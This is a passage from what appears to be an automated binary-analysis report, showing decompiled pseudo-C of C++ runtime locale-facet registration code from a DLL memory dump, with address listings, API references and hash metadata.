																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6d546e3c = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6D486FD3(__eflags, _t309);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6d546e34 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6D486FD3(__eflags, _t308);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6d546e30 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6D486FD3(__eflags, _t307);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6d546e2c = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

0x6d49b7f2
0x6d49b7f2
0x6d49b7f9
0x6d49b803
0x6d49b808
0x6d49b813
0x6d49b817
0x6d49b81a
0x6d49b81f
0x6d49b823
0x6d49b828
0x6d49b82c
0x6d49b871
0x6d49b874
0x6d49b880
0x6d49b82e
0x6d49b830
0x6d49b836
0x6d49b83c
0x6d49b844
0x6d49b847
0x6d49b884
0x6d49b892
0x6d49b897
0x6d49b89f
0x6d49b8a9
0x6d49b8ae
0x6d49b8b9
0x6d49b8bd
0x6d49b8c0
0x6d49b8c5
0x6d49b8ce
0x6d49b8d0
0x6d49b8d2
0x6d49b917
0x6d49b91a
0x6d49b926
0x6d49b8d4
0x6d49b8d4
0x6d49b8d6
0x6d49b8dc
0x6d49b8e2
0x6d49b8ea
0x6d49b8ed
0x6d49b92a
0x6d49b938
0x6d49b93d
0x6d49b945
0x6d49b94f
0x6d49b954
0x6d49b95f
0x6d49b963
0x6d49b966
0x6d49b96b
0x6d49b974
0x6d49b976
0x6d49b978
0x6d49b9bd
0x6d49b9c0
0x6d49b9cc
0x6d49b97a
0x6d49b97a
0x6d49b97c
0x6d49b982
0x6d49b988
0x6d49b990
0x6d49b993
0x6d49b9d0
0x6d49b9de
0x6d49b9e3
0x6d49b9eb
0x6d49b9f5
0x6d49b9fa
0x6d49ba05
0x6d49ba09
0x6d49ba0c
0x6d49ba11
0x6d49ba1a
0x6d49ba1c
0x6d49ba1e
0x6d49ba63
0x6d49ba66
0x6d49ba72
0x6d49ba20
0x6d49ba20
0x6d49ba22
0x6d49ba28
0x6d49ba2e
0x6d49ba36
0x6d49ba39
0x6d49ba76
0x6d49ba84
0x6d49ba89
0x6d49ba91
0x6d49ba9b
0x6d49baa0
0x6d49baab
0x6d49baaf
0x6d49bab2
0x6d49bab7
0x6d49bac0
0x6d49bac2
0x6d49bac4
0x6d49bb09
0x6d49bb0c
0x6d49bb18
0x6d49bac6
0x6d49bac6
0x6d49bac8
0x6d49bace
0x6d49bad4
0x6d49badc
0x6d49badf
0x6d49bb1c
0x6d49bb2a
0x6d49bb2f
0x6d49bb37
0x6d49bb41
0x6d49bb46
0x6d49bb51
0x6d49bb55
0x6d49bb58
0x6d49bb5d
0x6d49bb66
0x6d49bb68
0x6d49bb6a
0x6d49bbaf
0x6d49bbb2
0x6d49bbbe
0x6d49bb6c
0x6d49bb6c
0x6d49bb6e
0x6d49bb74
0x6d49bb7a
0x6d49bb82
0x6d49bb85
0x6d49bbc2
0x6d49bbd0
0x6d49bbd5
0x6d49bbdd
0x6d49bbe7
0x6d49bbec
0x6d49bbf7
0x6d49bbfb
0x6d49bbfe
0x6d49bc03
0x6d49bc0c
0x6d49bc0e
0x6d49bc10
0x6d49bc55
0x6d49bc58
0x6d49bc64
0x6d49bc12
0x6d49bc12
0x6d49bc14
0x6d49bc1a
0x6d49bc20
0x6d49bc28
0x6d49bc2b
0x6d49bc65
0x6d49bc68
0x6d49bc76
0x6d49bc7b
0x6d49bc83
0x6d49bc88
0x6d49bc8a
0x6d49bc90
0x6d49bc93
0x6d49bc9c
0x6d49bc9c
0x6d49bc9c
0x6d49bca0
0x6d49bca6
0x6d49bca9
0x6d49bcb5
0x6d49bc2d
0x6d49bc2d
0x6d49bc30
0x6d49bc34
0x6d49bc38
0x6d49bc45
0x6d49bc4d
0x6d49bc4f
0x00000000
0x6d49bc4f
0x6d49bc16
0x6d49bc16
0x00000000
0x6d49bc16
0x6d49bc14
0x6d49bb87
0x6d49bb87
0x6d49bb8a
0x6d49bb8e
0x6d49bb92
0x6d49bb9f
0x6d49bba7
0x6d49bba9
0x00000000
0x6d49bba9
0x6d49bb70
0x6d49bb70
0x00000000
0x6d49bb70
0x6d49bb6e
0x6d49bae1
0x6d49bae1
0x6d49bae4
0x6d49bae8
0x6d49baec
0x6d49baf9
0x6d49bb01
0x6d49bb03
0x00000000
0x6d49bb03
0x6d49baca
0x6d49baca
0x00000000
0x6d49baca
0x6d49bac8
0x6d49ba3b
0x6d49ba3b
0x6d49ba3e
0x6d49ba42
0x6d49ba46
0x6d49ba53
0x6d49ba5b
0x6d49ba5d
0x00000000
0x6d49ba5d
0x6d49ba24
0x6d49ba24
0x00000000
0x6d49ba24
0x6d49ba22
0x6d49b995
0x6d49b995
0x6d49b998
0x6d49b99c
0x6d49b9a0
0x6d49b9ad
0x6d49b9b5
0x6d49b9b7
0x00000000
0x6d49b9b7
0x6d49b97e
0x6d49b97e
0x00000000
0x6d49b97e
0x6d49b97c
0x6d49b8ef
0x6d49b8ef
0x6d49b8f2
0x6d49b8f6
0x6d49b8fa
0x6d49b907
0x6d49b90f
0x6d49b911
0x00000000
0x6d49b911
0x6d49b8d8
0x6d49b8d8
0x00000000
0x6d49b8d8
0x6d49b8d6
0x6d49b849
0x6d49b849
0x6d49b84c
0x6d49b850
0x6d49b854
0x6d49b861
0x6d49b869
0x6d49b86b
0x00000000
0x6d49b86b
0x6d49b832
0x6d49b832
0x00000000
0x6d49b832
0x6d49b830

APIs

__EH_prolog3.LIBCMT ref: 6D49B7F9
std::_Lockit::_Lockit.LIBCPMT ref: 6D49B803
int.LIBCPMT ref: 6D49B81A

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

messages.LIBCPMT ref: 6D49B83D
std::_Facet_Register.LIBCPMT ref: 6D49B854
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49B874
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49B892

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 3aa72b5272e881979272a1a7815dd27630060efacf22c1a259c8a4c1db3c6c24
Instruction ID: 00fa65088f8f25e43702fabee73ee7f86578a94643ceee72b398232552a14c46
Opcode Fuzzy Hash: 3aa72b5272e881979272a1a7815dd27630060efacf22c1a259c8a4c1db3c6c24
Instruction Fuzzy Hash: 0E11E375808119DBCF04EB65C880EEEBBB5AF98314F1A400CD611AB390DB70DD018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F60D, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F60D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;

				_t469 = __edx;
				_t358 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t506 - 0x14, 0);
				_t483 =  *0x6d546df4; // 0x0
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6D46161C(0x6d546da0);
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6D4866BA(_t506 - 0x14);
					return E6D4A0075(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6D4911AB(__ebx, _t361, __edx, _t471, _t483) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t506 - 0x20);
							E6D4A3D74(_t506 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t471, _t483, 0x14);
							E6D486653(_t506 - 0x14, 0);
							_t484 =  *0x6d546dc8; // 0x0
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6D46161C(0x6d546d7c);
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6D4866BA(_t506 - 0x14);
								return E6D4A0075(_t472);
							} else {
								__eflags = _t484;
								if(_t484 == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6D491230(_t358, _t368, __edx, _t472, _t484) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t506 - 0x20);
										E6D4A3D74(_t506 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t358, _t472, _t484, 0x14);
										E6D486653(_t506 - 0x14, 0);
										_t485 =  *0x6d546dc4; // 0x0
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6D46161C(0x6d546d78);
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6D4866BA(_t506 - 0x14);
											return E6D4A0075(_t473);
										} else {
											__eflags = _t485;
											if(_t485 == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6D4912B4(_t358, _t375, __edx, _t473, _t485) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t506 - 0x20);
													E6D4A3D74(_t506 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t358, _t473, _t485, 0x14);
													E6D486653(_t506 - 0x14, 0);
													_t486 =  *0x6d546dd8; // 0x0
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6D46161C(0x6d546d84);
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t206);
													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6D4866BA(_t506 - 0x14);
														return E6D4A0075(_t474);
													} else {
														__eflags = _t486;
														if(_t486 == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6D491339(_t358, _t382, _t469, _t474, _t486) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t506 - 0x20);
																E6D4A3D74(_t506 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t358, _t474, _t486, 0x14);
																E6D486653(_t506 - 0x14, 0);
																_t487 =  *0x6d546db0; // 0x0
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6D46161C(0x6d546d64);
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6D4866BA(_t506 - 0x14);
																	return E6D4A0075(_t475);
																} else {
																	__eflags = _t487;
																	if(_t487 == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6D4913A1(_t358, _t389, _t469, _t475, _t487) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t506 - 0x20);
																			E6D4A3D74(_t506 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t358, _t475, _t487, 0x14);
																			E6D486653(_t506 - 0x14, 0);
																			_t488 =  *0x6d546ddc; // 0x0
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6D46161C(0x6d546d88);
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6D4866BA(_t506 - 0x14);
																				return E6D4A0075(_t476);
																			} else {
																				__eflags = _t488;
																				if(_t488 == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6D491409(_t358, _t396, _t469, _t476, _t488) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t506 - 0x20);
																						E6D4A3D74(_t506 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t358, _t476, _t488, 0x14);
																						E6D486653(_t506 - 0x14, 0);
																						_t489 =  *0x6d546de0; // 0x0
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6D46161C(0x6d546d8c);
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6D4866BA(_t506 - 0x14);
																							return E6D4A0075(_t477);
																						} else {
																							__eflags = _t489;
																							if(_t489 == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6D491471(_t358, _t403, _t469, _t477, _t489) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t506 - 0x20);
																									E6D4A3D74(_t506 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t358, _t477, _t489, 0x14);
																									E6D486653(_t506 - 0x14, 0);
																									_t490 =  *0x6d546dfc; // 0x0
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6D46161C(0x6d546da8);
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6D4866BA(_t506 - 0x14);
																										return E6D4A0075(_t478);
																									} else {
																										__eflags = _t490;
																										if(_t490 == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6D4914EC(_t358, _t410, _t469, _t478, _t490) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t506 - 0x20);
																												E6D4A3D74(_t506 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t358, _t478, _t490, 0x14);
																												E6D486653(_t506 - 0x14, 0);
																												_t491 =  *0x6d546dcc; // 0x0
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6D46161C(0x6d546d80);
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6D4866BA(_t506 - 0x14);
																													return E6D4A0075(_t479);
																												} else {
																													__eflags = _t491;
																													if(_t491 == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6D491558(_t358, _t417, _t469, _t479, _t491) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t506 - 0x20);
																															E6D4A3D74(_t506 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t358, _t479, _t491, 0x14);
																															E6D486653(_t506 - 0x14, 0);
																															_t492 =  *0x6d546e00; // 0x0
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6D46161C(0x6d546dac);
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6D4866BA(_t506 - 0x14);
																																return E6D4A0075(_t480);
																															} else {
																																__eflags = _t492;
																																if(_t492 == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6D4915C4(_t358, _t424, _t469, _t480, _t492) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t506 - 0x20);
																																		E6D4A3D74(_t506 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t358, _t480, _t492, 0x14);
																																		E6D486653(_t506 - 0x14, 0);
																																		_t493 =  *0x6d546dd0; // 0x0
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6D46161C(0x6d546d60);
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6D46171B( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6D4866BA(_t506 - 0x14);
																																			return E6D4A0075(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(_t493 == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6D49162A(_t358, _t431, _t469, _t481, _t493) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6D461438(_t435);
																																					E6D4A3D74(_t506 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e851f, _t358, _t481, _t493, 4);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6d4ec0c4;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6D49542F(_t358, _t435, _t469, _t481, _t494,  *_t161);
																																					return E6D4A0075(_t494,  *((intOrPtr*)(_t506 + 8)));
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6D486FD3(__eflags, _t481);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6d546dd0 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6D486FD3(__eflags, _t480);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6d546e00 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6D486FD3(__eflags, _t479);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6d546dcc = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6D486FD3(__eflags, _t478);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6d546dfc = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6D486FD3(__eflags, _t477);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6d546de0 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6D486FD3(__eflags, _t476);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6d546ddc = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
																			 *(_t506 - 4) = 1;
																			E6D486FD3(__eflags, _t475);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6d546db0 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6D486FD3(__eflags, _t474);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6d546dd8 = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6D486FD3(__eflags, _t473);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6d546dc4 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6D486FD3(__eflags, _t472);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6d546dc8 = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6D486FD3(__eflags, _t471);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6d546df4 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}

0x6d48f60d
0x6d48f60d
0x6d48f614
0x6d48f61e
0x6d48f623
0x6d48f62e
0x6d48f632
0x6d48f635
0x6d48f63a
0x6d48f63e
0x6d48f643
0x6d48f647
0x6d48f68c
0x6d48f68f
0x6d48f69b
0x6d48f649
0x6d48f64b
0x6d48f651
0x6d48f657
0x6d48f65f
0x6d48f662
0x6d48f69f
0x6d48f6ad
0x6d48f6b2
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e9
0x6d48f6eb
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
